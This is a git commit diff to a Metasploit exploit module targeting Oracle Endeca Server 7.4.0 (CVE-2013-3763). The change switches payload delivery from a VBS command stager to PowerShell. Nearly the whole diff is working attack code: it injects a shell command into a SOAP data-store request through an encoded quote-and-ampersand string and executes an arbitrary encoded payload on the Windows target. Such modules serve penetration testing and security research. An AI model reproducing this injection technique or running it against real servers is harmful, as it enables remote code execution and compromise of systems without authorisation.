Switch to powershell to exec payload

jvazquez-r7 · jvazquez-r7 · commit ad214da3de73 · 2013-08-23T14:39:29.000-05:00
diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::Powershell
 
 	def initialize
 		super(
@@ -29,7 +29,7 @@ def initialize
 				'juan vazquez' # Metasploit module
 			],
 			'Platform'    => 'win',
-			'Arch'        => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
+			'Arch'        => [ ARCH_X86_64, ARCH_X86 ],
 			'References'  =>
 				[
 					[ 'CVE', '2013-3763' ],
@@ -40,7 +40,7 @@ def initialize
 				],
 			'Targets'     =>
 				[
-					[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
+					[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => false,
@@ -131,21 +131,24 @@ def send_request_soap(data)
 	end
 
 	def exploit
-		print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
-		# Windows 2008 Command Prompt Max Length is 8191
-		execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
+		command = cmd_psh_payload(payload.encoded)
+		if command.length > 8000
+			# Windows 2008 Command Prompt Max Length is 8191
+			fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
+		end
+		print_status("#{peer} - Exploiting through Powershell...")
+		execute_command(command)
 	end
 
-	def execute_command(cmd, opts)
-		# To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
-		cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
+	def execute_command(cmd)
 		# HTML encode ampersands so SOAP is correctly interpreted
 		cmd.gsub!(/&/, "&#x26;")
 		injection = "c:\\&#x22;&#x26; #{cmd} &#x26;&#x22;"
 		exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
 		begin
 			res = send_request_soap(exploit_data)
-			if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
+			if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
+				print_status("#{res.code}\n#{res.body}") if res
 				fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
 			end
 		rescue ::Rex::ConnectionError
